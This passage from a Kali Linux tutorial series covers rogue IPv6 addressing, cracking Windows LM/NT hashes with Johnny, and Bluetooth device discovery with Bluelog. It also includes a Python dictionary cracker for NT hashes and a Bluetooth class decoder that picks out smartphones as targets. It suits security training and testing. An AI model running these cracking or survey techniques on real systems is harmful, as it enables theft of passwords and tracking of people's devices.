If it is version 7 (CentOS/RHEL 7), you can also try

nmcli con show <name> | grep bad    (replace bad with your network prefix)

[Screenshot: fake address on a Red Hat server's auto-configured interface]

 

And remarkably, my physical machine running fully updated Windows 8.1 also picked up an address from the rogue prefix, even though I did not restart its network.

[Screenshot: physical machines being affected]

Hope you liked this tutorial. Remember: be a white hat or grey hat, not a script kiddie.

Johnny

Lab 2: Test the password complexity of a Windows system by cracking Windows hashes with Johnny

On Windows, if LM hashing has not been disabled, two hashes are stored for each account in the SAM (Security Account Manager) database. They are not stored in the clear: they are obfuscated with a key derived from the SYSTEM hive, so they must first be extracted and decoded into a file. Kali has tools for that, described elsewhere in this series; see samdump2 (used together with the SYSTEM hive for the boot key). For this lab we start from a dump file named “hashes” containing the LM and NT (commonly called NTLM) hashes.

The first is the LM hash (relatively easy to crack because of design flaws, but often stored for backwards-compatibility)

The second is the NTLM hash which can be more difficult to crack (when used with strong passwords).

Step 1: Load the hashes file into Johnny.

[Screenshot: loading the hashes file]

Step 2: Select LM as format in the options tab.

[Screenshot: selecting the format]

Step 3: Start Attack and look for results

[Screenshot: cracked passwords shown]

Both this lab and the previous one on Johnny can be very time-consuming and processor-intensive. Brute-forcing a long password can take longer than a lifetime, so most of the time we use a wordlist attack instead, supplying a list of candidate passwords.

If you want to know what is happening under the hood, read on.

Brute-forcing simply means trying every combination in a given key space. Suppose you have a suitcase with a three-digit combination lock and have forgotten the code. You try every combination from 000 to 999, and the only question is how long that takes. Brute-forcing a password hash works the same way: the program identifies the hash algorithm, works out the key space (character set and length) and hashes every candidate in it until one matches.

The wordlist attack, also known as a dictionary attack, replaces the exhaustive key space with a list of likely passwords. The program (here john) identifies the hash type, computes the corresponding hash of each word in the list and compares it with the hash to be cracked. Because most passwords are words, names or simple variations of them, this is usually far faster than brute force. We will do a couple of wordlist attacks in later tutorials.
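Added example (not John the Ripper's code or this tutorial's own): a pure-Python NT hash (MD4 over the UTF-16LE password), the LM preprocessing that makes LM hashes so weak, and a dictionary attack against a pwdump-style dump of the kind samdump2 produces. MD4 is implemented by hand because hashlib's md4 is often disabled under OpenSSL 3. The dump lines and wordlist are constructed: the LM field holds the well-known “empty LM hash” value, Administrator's NT hash is that of "password", Guest's is that of the empty password, and bob's hash matches nothing in the list.

```python
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented here because hashlib's md4 is often unavailable
    under OpenSSL 3 (it lives in the legacy provider)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(16):                                   # round 1
            a, b, c, d = d, _rotl((a + f(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rotl((a + h(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password. No salt, so one hash per candidate
    serves every account, which is why lookup tables and rainbow tables work so well."""
    return md4(password.encode("utf-16-le")).hex()


def lm_halves(password: str) -> tuple:
    """LM preprocessing: upper-case, cut or zero-pad to 14 bytes, split into two 7-byte
    DES keys. Case is lost and each half is attacked independently, so a 14-character
    password costs no more to crack than two 7-character ones."""
    p = password.upper().encode("latin-1", "replace")[:14].ljust(14, b"\x00")
    return p[:7], p[7:]


def parse_pwdump(text: str) -> list:
    """pwdump/samdump2 line: user:rid:lm_hash:nt_hash:::"""
    rows = []
    for line in text.splitlines():
        if line.strip():
            user, rid, lm, nt = line.split(":")[:4]
            rows.append((user, int(rid), lm.lower(), nt.lower()))
    return rows


def crack_nt(rows: list, wordlist: list) -> dict:
    """Dictionary attack: hash every candidate once, then look up each account's NT hash."""
    table = {nt_hash(w): w for w in wordlist}
    return {user: table[nt] for user, _, _, nt in rows if nt in table}


# Constructed dump (not from a real machine). The LM field holds the well-known value
# for 'no LM hash stored'; bob's NT hash belongs to no word in WORDLIST and stays uncracked.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
"""
WORDLIST = ["123456", "password", "letmein", "qwerty", "", "Summer2015"]

if __name__ == "__main__":
    print("LM halves of 'Password123':", lm_halves("Password123"))
    print(crack_nt(parse_pwdump(SAMPLE_DUMP), WORDLIST))
```

The lookup in crack_nt is the whole reason wordlist attacks are cheap against NT hashes: with no per-account salt, each candidate is hashed once and compared against every account, so doubling the number of accounts costs nothing extra.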

 

http://en.wikipedia.org/wiki/Brute-force_attack

http://searchsecurity.techtarget.com/definition/dictionary-attack

Bluelog

Simple Bluetooth Discovery with Bluelog

Bluelog is a simple Bluetooth scanner designed to do essentially one thing: log all the discoverable devices in the area. It is intended as a site-survey tool for counting the possible Bluetooth targets in the surrounding environment. It only sees devices that are in discoverable mode (PCs, phones, printers and so on); devices with discoverability turned off do not show up.

Note: Make sure you are not testing this tool on a VM, or if you are, you need to plugin in a USB bluetooth device and attach it to your VM. Also make sure that the device is turned on. Read on for further guidelines.

Options

Syntax: bluelog -i <interface> <options>

Basic options:
  -i <interface>   Set scanning device, default is “hci0”
  -o <filename>    Set output filename, default is “devices.log”
  -v               Verbose, print discovered devices to the terminal
  -q               Quiet, turn off nonessential terminal output
  -d               Daemon mode, Bluelog runs in the background
  -k               Kill an already running Bluelog process
  -l               Start “Bluelog Live”, default is disabled

Logging options:
  -n               Write device names to log, default is disabled
  -m               Write device manufacturer to log, default is disabled
  -c               Write device class to log, default is disabled
  -f               Use “friendly” device class, default is disabled
  -t               Write timestamps to log, default is disabled
  -x               Obfuscate discovered MACs, default is disabled
  -e               Encode discovered MACs with CRC32, default is disabled
  -b               Enable BlueProPro log format, see README

Advanced options:
  -r <retries>     Name resolution retries, default is 3
  -a <minutes>     Amnesia, Bluelog forgets a device after the given time
  -w <seconds>     Scanning window in seconds, see README
  -s               Syslog only mode, no log file, default is disabled

 

Bluelog Homepage: http://www.digifail.com/software/bluelog.shtml


Lab1 : Scan all Bluetooth Devices and log them to a file.

In this lab we simply scan for all Bluetooth devices nearby and log them to a file. First we need to check our Bluetooth interface. As mentioned, use a physical machine with the Bluetooth adapter turned ON. On some laptops the hotkeys for turning devices on and off do not work under Kali Linux, and you may have to load additional kernel modules to fix that. For the following two labs I used a Lenovo notebook, which gave me some trouble with Kali at first. Anyway, let's proceed.

 

Step 1: Ensure your Bluetooth device is working and get its MAC.

Command: hciconfig

[Screenshot: Bluetooth interface details]

From this we can see the Bluetooth device present in our system/machine. Here we have an interface which is hci0.

 

Step 2: Start scanning

Command: bluelog -i hci0 -o /root/Desktop/btdevices.log -v

[Screenshot: Bluelog scanning, devices appearing]

Check btdevices.log after about 10 minutes. It lists all the discoverable devices near you and your machine.

[Screenshot: output file]

 


Lab 2 : Logging Additional Information

In this lab we log additional information: manufacturer, broadcast names and device class.

Command: bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log -v

[Screenshot: advanced options]

Then Check the file btdevices2.log

[Screenshot: output file]

Note: Scanning is a time-consuming process; the more patience you have, the better the results. The procedure resembles wardriving (warwalking, really): with a portable device you can carry around, plus a little social engineering, you get great results.
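Bluelog's -c and -f options log the Bluetooth Class of Device (CoD), a 24-bit field from the Bluetooth Assigned Numbers that encodes the major service classes, the major device class and the minor device class. As an added example (not Bluelog's code), here is a Python decoder for that field plus a small survey summary over constructed records; the MACs, names and class values are made up, and the record layout is this snippet's own, not Bluelog's log format.

```python
from collections import Counter

# Bluetooth Class of Device (CoD): 24 bits. Bits 2-7 minor device class, bits 8-12
# major device class, bits 13-23 major service classes (Bluetooth Assigned Numbers).
MAJOR_DEVICE = {0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network access point",
                4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable", 8: "Toy",
                9: "Health", 31: "Uncategorized"}
MINOR_DEVICE = {  # only the majors most often seen in a survey are spelled out
    1: {0: "Uncategorized", 1: "Desktop", 2: "Server", 3: "Laptop", 4: "Handheld PC/PDA",
        5: "Palm-size PC/PDA", 6: "Wearable computer", 7: "Tablet"},
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
    4: {1: "Wearable headset", 2: "Hands-free", 4: "Microphone", 5: "Loudspeaker",
        6: "Headphones", 7: "Portable audio", 8: "Car audio"},
}
MAJOR_SERVICE = {13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
                 18: "Rendering", 19: "Capturing", 20: "Object Transfer", 21: "Audio",
                 22: "Telephony", 23: "Information"}


def decode_class(cod: int) -> dict:
    """Split a CoD into human-readable major/minor device class and service classes."""
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    return {
        "major": MAJOR_DEVICE.get(major, "Reserved (%d)" % major),
        "minor": MINOR_DEVICE.get(major, {}).get(minor, "minor 0x%02x" % minor),
        "services": [name for bit, name in MAJOR_SERVICE.items() if cod & (1 << bit)],
    }


def survey(records: list) -> Counter:
    """Count devices per major device class, as a site survey would report them."""
    return Counter(decode_class(cod)["major"] for _, _, cod in records)


def phones(records: list) -> list:
    """Names of records whose CoD says Phone/Smartphone, the usual soft targets."""
    return [name for _, name, cod in records
            if decode_class(cod)["major"] == "Phone" and decode_class(cod)["minor"] == "Smartphone"]


# Constructed records (MAC, broadcast name, CoD); not a real survey and not Bluelog's
# on-disk format, which you would parse according to the options you logged with.
RECORDS = [
    ("00:11:22:33:44:55", "Alice's phone", 0x5A020C),
    ("66:77:88:99:AA:BB", "LAPTOP-7F3", 0x10010C),
    ("CC:DD:EE:00:11:22", "BT Headset", 0x240404),
    ("33:44:55:66:77:88", "Bob's phone", 0x5A020C),
]

if __name__ == "__main__":
    for mac, name, cod in RECORDS:
        print(mac, name, decode_class(cod))
    print(survey(RECORDS))
    print("smartphones:", phones(RECORDS))
```

The value 0x5A020C is the classic smartphone class (Phone/Smartphone with the Networking, Capturing, Object Transfer and Telephony service bits); seeing it against a MAC in a survey tells you what kind of device is nearby even when the name is withheld.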